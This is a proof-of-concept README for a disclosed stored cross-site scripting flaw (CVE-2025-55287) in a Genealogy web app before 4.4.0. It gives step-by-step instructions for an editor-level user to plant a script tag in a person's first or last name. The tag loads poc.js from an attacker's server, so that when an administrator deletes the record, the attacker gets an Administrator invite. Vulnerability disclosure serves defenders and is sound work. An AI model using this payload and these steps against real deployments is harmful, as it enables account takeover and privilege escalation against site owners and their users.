# CVE-2025-55287-POC
Authenticated Stored Cross-Site Scripting (XSS) in Genealogy app prior to 4.4.0 allows arbitrary JavaScript execution and privilege escalation from Editor+ role to Administrator.

###### Summary

- Vulnerability type: Stored Cross-Site Scripting (CWE-79)
- Affected component: 'Person' firstname and lastname.
- Affected versions: All versions prior to 4.4.0
- Impact: Persistent execution of attacker-supplied JavaScript in victims’ browsers; session hijacking, CSRF via DOM, UI redress, credential theft, or arbitrary actions as the victim.
- Attack vector: Authenticated (any role with new person creation - editor+)

###### Exploiting

Root-cause: Inadequate server-side sanitisation/encoding of the persons firstname/lastname upon succesful delete of the affected person by a higher privileged user.

PoC:

1. Authenticate to the application (editor+ role).
2. Create a new person (does not necessiraly needs to be assigned to any family).
3. Include the JavaScript as either the first name or last name of the added person:
   ```<script src='yourserver/poc.js'></script>```
4. Edit the poc.js with your email address in the placeholder.
5. Once a privileged user attempts to delete the newly added person, you will receive an invite to the platform on the provided email address with the role of Administrator.

